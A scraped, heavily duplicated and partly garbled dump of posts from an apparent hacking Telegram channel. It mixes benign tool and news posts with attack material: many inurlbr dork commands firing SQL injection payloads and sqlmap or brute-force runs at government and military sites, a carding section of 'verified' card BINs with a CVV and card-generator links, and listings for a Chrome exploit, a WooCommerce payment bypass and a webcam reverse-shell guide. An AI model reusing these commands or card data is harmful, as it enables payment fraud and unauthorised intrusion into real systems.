β β β Uππ»βΊπ«6π¬πβ β β β
π¦BEST 2020 BROWSER LOG CLEANER(Carding) & System logs REMOVER :
BleachBit cleans files to free disk space and to maintain privacy.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
-PARROT
-KALI
-UBUNTU
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦BEST 2020 BROWSER LOG CLEANER(Carding) & System logs REMOVER :
BleachBit cleans files to free disk space and to maintain privacy.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/bleachbit/bleachbit.gitπ¦TESTED ON':
2οΈβ£cd bleachbit
3οΈβ£Then install via make command
> make -C po local # build translations
4οΈβ£python3 bleachbit.py
5οΈβ£For information regarding the command line interface, run:
> python3 bleachbit.py --help
-PARROT
-KALI
-UBUNTU
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
2020 Bug chrome metas.rb
12.1 KB
2020 Bug Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)
-USE FOR LEARN !!β β β Uππ»βΊπ«6π¬πβ β β β
π¦How Run Python Hacking Scripts Via windows :
#FastTips
1οΈβ£Download
> https://www.python.org/downloads/windows/
2οΈβ£Run setup file
3οΈβ£Download :
https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16
4οΈβ£run setup
video tutorial :
> https://www.youtube.com/watch?v=n5sJ4EewKGk&autoplay=1
5οΈβ£Go powerShell and type :
> pip install --upgrade setuptools
6οΈβ£Now you can install git:
https://git-scm.com/download/win
(Download & run)
& more libs from powershell
& load and Python Script
ENJOY β€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How Run Python Hacking Scripts Via windows :
#FastTips
1οΈβ£Download
> https://www.python.org/downloads/windows/
2οΈβ£Run setup file
3οΈβ£Download :
https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16
4οΈβ£run setup
video tutorial :
> https://www.youtube.com/watch?v=n5sJ4EewKGk&autoplay=1
5οΈβ£Go powerShell and type :
> pip install --upgrade setuptools
6οΈβ£Now you can install git:
https://git-scm.com/download/win
(Download & run)
& more libs from powershell
& load and Python Script
ENJOY β€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Python.org
Python Releases for Windows
The official home of the Python Programming Language
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Linux-Termux tip :
What is BBQSQL?
> Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
βExample :
You need to provide the following placeholders of information in order for the attack to work. Once you put these in your query, bbqSQL will do the rest:
${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.
${char_index}: This tells bbqSQL which character from the subselect to query.
${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.
${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.
${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.
Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.
6οΈβ£FOR MORE EXAMPLES :
https://github.com/Neohapsis/bbqsql#install
π¦Features :
URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Linux-Termux tip :
What is BBQSQL?
> Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/Neohapsis/bbqsql.git5οΈβ£The query syntax is based around placeholders which tell BBQSQL how to execute the attack ?
2οΈβ£cd bbqsql
3οΈβ£install in one command :
sudo pip install bbqsql (kali-parrot repo)
4οΈβ£for termux
> python setup.py install
βExample :
You need to provide the following placeholders of information in order for the attack to work. Once you put these in your query, bbqSQL will do the rest:
${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.
${char_index}: This tells bbqSQL which character from the subselect to query.
${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.
${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.
${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.
Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.
6οΈβ£FOR MORE EXAMPLES :
https://github.com/Neohapsis/bbqsql#install
π¦Features :
URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - CiscoCXSecurity/bbqsql: SQL Injection Exploitation Tool
SQL Injection Exploitation Tool. Contribute to CiscoCXSecurity/bbqsql development by creating an account on GitHub.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#Privilege Escalationβ οΈMethodes & Tools :
> [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE
> [A GUIDE TO LINUX PRIVILEGE ESCALATION](https://payatu.com/guide-linux-privilege-escalation/) | Basics of Linux privilege escalation
> [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) | Abusing SUDO (Linux Privilege Escalation)
> [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb
> [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows
> [Common Windows Privilege Escalation Vectors](https://www.toshellandback.com/2015/11/24/ms-priv-esc/) | Common Windows Privilege Escalation Vectors
> [Editing /etc/passwd File for Privilege Escalation](http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) | Editing /etc/passwd File for Privilege Escalation
> [Linux Privilege Escalation ](https://securityweekly.com/2017/12/17/linux-privilege-escalation-tradecraft-security-weekly-22/) | Linux Privilege Escalation Γ’β¬β Tradecraft Security Weekly (Video)
> [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script
> [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered
> [Linux Privilege Escalation Using PATH Variable](http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/) | Linux Privilege Escalation Using PATH Variable
> [Linux Privilege Escalation using Misconfigured NFS](http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) | Linux Privilege Escalation using Misconfigured NFS
> [Linux Privilege Escalation via Dynamically Linked Shared Object Library](https://www.contextis.com/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library) | How RPATH and Weak File Permissions can lead to a system compromise.
> [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script
> [OSCP - Windows Priviledge Escalation](http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) | Common Windows Priviledge Escalation
> [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux
> [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux
ENJOY β€οΈππ»
β Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#Privilege Escalationβ οΈMethodes & Tools :
> [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE
> [A GUIDE TO LINUX PRIVILEGE ESCALATION](https://payatu.com/guide-linux-privilege-escalation/) | Basics of Linux privilege escalation
> [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) | Abusing SUDO (Linux Privilege Escalation)
> [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb
> [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows
> [Common Windows Privilege Escalation Vectors](https://www.toshellandback.com/2015/11/24/ms-priv-esc/) | Common Windows Privilege Escalation Vectors
> [Editing /etc/passwd File for Privilege Escalation](http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) | Editing /etc/passwd File for Privilege Escalation
> [Linux Privilege Escalation ](https://securityweekly.com/2017/12/17/linux-privilege-escalation-tradecraft-security-weekly-22/) | Linux Privilege Escalation Γ’β¬β Tradecraft Security Weekly (Video)
> [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script
> [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered
> [Linux Privilege Escalation Using PATH Variable](http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/) | Linux Privilege Escalation Using PATH Variable
> [Linux Privilege Escalation using Misconfigured NFS](http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) | Linux Privilege Escalation using Misconfigured NFS
> [Linux Privilege Escalation via Dynamically Linked Shared Object Library](https://www.contextis.com/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library) | How RPATH and Weak File Permissions can lead to a system compromise.
> [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script
> [OSCP - Windows Priviledge Escalation](http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) | Common Windows Priviledge Escalation
> [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux
> [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux
ENJOY β€οΈππ»
β Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#Online News Sources :
> InfoSec | covers all the latest infosec topics
> Recent Hash Leaks | great place to lookup hashes
> Security Intell | covers all kinds of news, great intelligence resources
> Threatpost | covers all the latest threats and breaches
> Secjuice
> The Hacker News | features a daily stream of hack news, also has an app
ENJOY β€οΈππ»
β Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#Online News Sources :
> InfoSec | covers all the latest infosec topics
> Recent Hash Leaks | great place to lookup hashes
> Security Intell | covers all kinds of news, great intelligence resources
> Threatpost | covers all the latest threats and breaches
> Secjuice
> The Hacker News | features a daily stream of hack news, also has an app
ENJOY β€οΈππ»
β Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Infosecurity Magazine
Infosecurity Magazine - Strategy, Insight, Technology
The award winning online magazine dedicated to the strategy, insight and technology of information security
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some resources for Beginers :
- How to Become a Successful Bug Bounty Hunter
- Researcher Resources - How to become a Bug Bounty Hunter
- Bug Bounties 101
- The life of a bug bounty hunter
- Awsome list of bugbounty cheatsheets
- Getting Started - Bug Bounty Hunter Methodology
:)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some resources for Beginers :
- How to Become a Successful Bug Bounty Hunter
- Researcher Resources - How to become a Bug Bounty Hunter
- Bug Bounties 101
- The life of a bug bounty hunter
- Awsome list of bugbounty cheatsheets
- Getting Started - Bug Bounty Hunter Methodology
:)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
HackerOne
How to Become a Successful Bug Bounty Hunter
Anyone with computer skills and high degree of curiosity can become a successful finder of vulnerabilities. Hereβs how I started.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦SCANNER-INURLBR -Termux-Linux :
> Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found..->
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'
./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'
./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'
./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?Β΄0x27 --command-vul 'nmap sV -p 22,80,21 TARGET'
./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?Β΄0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssqllogin RHOST=TARGETIP MSSQLUSER=inurlbr MSSQLPASSFILE=/home/pedr0/Documentos/passwords E'
./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?Β΄'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "TARGETFULL" --dbs'
./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?Β΄0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open TARGET'
./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '(\w\d\.\-\_+)@(\w\d\.\_\-+)'
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u
./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6
./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'
./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6
./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦SCANNER-INURLBR -Termux-Linux :
> Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found..->
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
git clone https://github.com/googleinurl/SCANNER-INURLBR.git
2οΈβ£cd SCANNER-INURLBR
3οΈβ£$chmod +x inurlbr.php
4οΈβ£ ./inurlbr.php
5οΈβ£To get a list of basic options and switches use:
php inurlbr.php -h
6οΈβ£SOME EXAMPLES :./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'
./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'
./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'
./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?Β΄0x27 --command-vul 'nmap sV -p 22,80,21 TARGET'
./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?Β΄0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssqllogin RHOST=TARGETIP MSSQLUSER=inurlbr MSSQLPASSFILE=/home/pedr0/Documentos/passwords E'
./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?Β΄'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "TARGETFULL" --dbs'
./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?Β΄0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open TARGET'
./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '(\w\d\.\-\_+)@(\w\d\.\_\-+)'
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u
./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6
./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'
./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6
./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
IDS, IPS AND FIREWALL EVASION USING NMAP .pdf
1.1 MB
IDS, IPS AND FIREWALL EVASION USING NMAP- full guide -
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Developers added a series of RISC-V UEFI support patches for Linux
#UndercodeNews
> Earlier this year, the UEFI code in Linux has been cleaned up, and then a series of early patches for RISC-V UEFI support were proposed to form a more comprehensive patch set for enabling RISC-V UEFI support under Linux. Recently, some developers have submitted a series of patches to solve a large number of problems while adding some new capabilities to support RISC-V UEFI under Linux.
> Developer Atish Patra is from Western Digital. He submitted 11 patches last Thursday. According to his introduction, patches 1-6 are preparatory patches that fix some common efi and riscv issues; patches 7-9 add Efi stub support for RISC-V was submitted for review in April; patch 10 renamed arm-init so that the foundation can be used in different code; patch 11 adds runtime services for RISC-V.
π¦To sum up, the main contributions of this series of patches are:
βAdded full ioremap support.
βAdded efi runtime service support.
βFixed the mm problem.
> At present, the patch has been verified on Qemu using the bootefi command in U-Boot, and has passed the test on both RISC-V 32-bit and RISC-V 64-bit. However, some problems of EDK2 code on RISC-V are still being solved, mainly the problems related to SPI and network driver.
> This series of patches hits the Linux kernel 5.8-rc2 and is still in the PR state, waiting for the code review. If the related issues are resolved and finally accepted, then it should be visible when Linux 5.8 is released.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Developers added a series of RISC-V UEFI support patches for Linux
#UndercodeNews
> Earlier this year, the UEFI code in Linux has been cleaned up, and then a series of early patches for RISC-V UEFI support were proposed to form a more comprehensive patch set for enabling RISC-V UEFI support under Linux. Recently, some developers have submitted a series of patches to solve a large number of problems while adding some new capabilities to support RISC-V UEFI under Linux.
> Developer Atish Patra is from Western Digital. He submitted 11 patches last Thursday. According to his introduction, patches 1-6 are preparatory patches that fix some common efi and riscv issues; patches 7-9 add Efi stub support for RISC-V was submitted for review in April; patch 10 renamed arm-init so that the foundation can be used in different code; patch 11 adds runtime services for RISC-V.
π¦To sum up, the main contributions of this series of patches are:
βAdded full ioremap support.
βAdded efi runtime service support.
βFixed the mm problem.
> At present, the patch has been verified on Qemu using the bootefi command in U-Boot, and has passed the test on both RISC-V 32-bit and RISC-V 64-bit. However, some problems of EDK2 code on RISC-V are still being solved, mainly the problems related to SPI and network driver.
> This series of patches hits the Linux kernel 5.8-rc2 and is still in the PR state, waiting for the code review. If the related issues are resolved and finally accepted, then it should be visible when Linux 5.8 is released.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Break webcam-cctv like expert .pdf
2.4 MB
Control webcam via reverse shell !pro
β β β Uππ»βΊπ«6π¬πβ β β β
π¦ New 2020 Linux Distributions-Good for any Linux developer :
[The Appliance for Digital Investigation and Analysis (ADIA)](https://forensics.cert.org/#ADIA) - VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 (32-bit) and x86_64 (64-bit) versions are available.
Computer Aided Investigative Environment (CAINE) - Contains numerous tools that help investigators during their analysis, including forensic evidence collection.
[CCF-VM](https://github.com/rough007/CCF-VM) - CyLR CDQR Forensics Virtual Machine (CCF-VM): An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously.
Digital Evidence & Forensics Toolkit (DEFT) - Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit (DART) for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.
[NST - Network Security Toolkit](https://sourceforge.net/projects/nst/files/latest/download?source=files) - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.
PALADIN - Modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included.
[Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - Special Linux distro aimed at network security monitoring featuring advanced analysis tools.
SANS Investigative Forensic Toolkit (SIFT) Workstation - Demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦ New 2020 Linux Distributions-Good for any Linux developer :
[The Appliance for Digital Investigation and Analysis (ADIA)](https://forensics.cert.org/#ADIA) - VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 (32-bit) and x86_64 (64-bit) versions are available.
Computer Aided Investigative Environment (CAINE) - Contains numerous tools that help investigators during their analysis, including forensic evidence collection.
[CCF-VM](https://github.com/rough007/CCF-VM) - CyLR CDQR Forensics Virtual Machine (CCF-VM): An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously.
Digital Evidence & Forensics Toolkit (DEFT) - Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit (DART) for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.
[NST - Network Security Toolkit](https://sourceforge.net/projects/nst/files/latest/download?source=files) - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.
PALADIN - Modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included.
[Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - Special Linux distro aimed at network security monitoring featuring advanced analysis tools.
SANS Investigative Forensic Toolkit (SIFT) Workstation - Demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Carnegie Mellon University's Software Engineering Institute
Digital Forensics: Advancing Solutions for Today's Escalating Cybercrime
As cybercrime proliferates, CERT researchers help law enforcement investigators process digital evidence with courses, methodologies and tools, skills, and experience.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Verified Bin- from few days :
β Bin For XBoxβ :
Bin : 4095890041xxxxxx
CVV/Date: RND
IP : USAπΊπΈ
β Bin For SoundCloud Goβ
Bin : 5422175006xxxxxx
Date: 05/21
CVV : 917
IP : USA πΊπΈ
βBin For Skype β
Bin : 515462003565xxxx
CVV/Date: RND
IP : USA πΊπΈ
βCc GENETRATORS
> https://t.me/UNDERCODEHACKING/2150
Enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Verified Bin- from few days :
β Bin For XBoxβ :
Bin : 4095890041xxxxxx
CVV/Date: RND
IP : USAπΊπΈ
β Bin For SoundCloud Goβ
Bin : 5422175006xxxxxx
Date: 05/21
CVV : 917
IP : USA πΊπΈ
βBin For Skype β
Bin : 515462003565xxxx
CVV/Date: RND
IP : USA πΊπΈ
βCc GENETRATORS
> https://t.me/UNDERCODEHACKING/2150
Enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Telegram
UNDERCODE HACKING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦57 New cc generator list
1) https://namso-gen.com
2) http://namso.ezyro.com/?i=1
3) http://archive.li/gvfdN
4) https://ia1000.com
6) http://sourcebinccgen.ml/CCGENSBC1/
7) http://sourcebinccgen.ml/CCGENSBC2/
8) https://obtainβ¦
π¦57 New cc generator list
1) https://namso-gen.com
2) http://namso.ezyro.com/?i=1
3) http://archive.li/gvfdN
4) https://ia1000.com
6) http://sourcebinccgen.ml/CCGENSBC1/
7) http://sourcebinccgen.ml/CCGENSBC2/
8) https://obtainβ¦
Wordpress Payment BUG 2020 .php
6.2 KB
WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
- Leak & Uploaded to Db-
- Leak & Uploaded to Db-
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST MULTI PC BOOT SOFTWARES 2020 :
> Grub bOOT
https://www.gnu.org/software/grub/
> refind
https://sourceforge.net/projects/refind/
> Visual BCD Editor
https://visual-bcd-editor.en.softonic.com/#:~:text=Author's%20review-,Visual%20BCD%20Editor%20is%20an%20advanced%20GUI%20version%20of%20Windows,Every%20property%20is%20editable.
> Libreboot
https://libreboot.org/
> coreboot
https://www.coreboot.org/
> GAG
https://sourceforge.net/projects/gag/
> gummiboot
https://pkgs.org/download/gummiboot β (avaible for pc & androids apk...)
π¦There is More But Those Top Rated in 2020
Enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦BEST MULTI PC BOOT SOFTWARES 2020 :
> Grub bOOT
https://www.gnu.org/software/grub/
> refind
https://sourceforge.net/projects/refind/
> Visual BCD Editor
https://visual-bcd-editor.en.softonic.com/#:~:text=Author's%20review-,Visual%20BCD%20Editor%20is%20an%20advanced%20GUI%20version%20of%20Windows,Every%20property%20is%20editable.
> Libreboot
https://libreboot.org/
> coreboot
https://www.coreboot.org/
> GAG
https://sourceforge.net/projects/gag/
> gummiboot
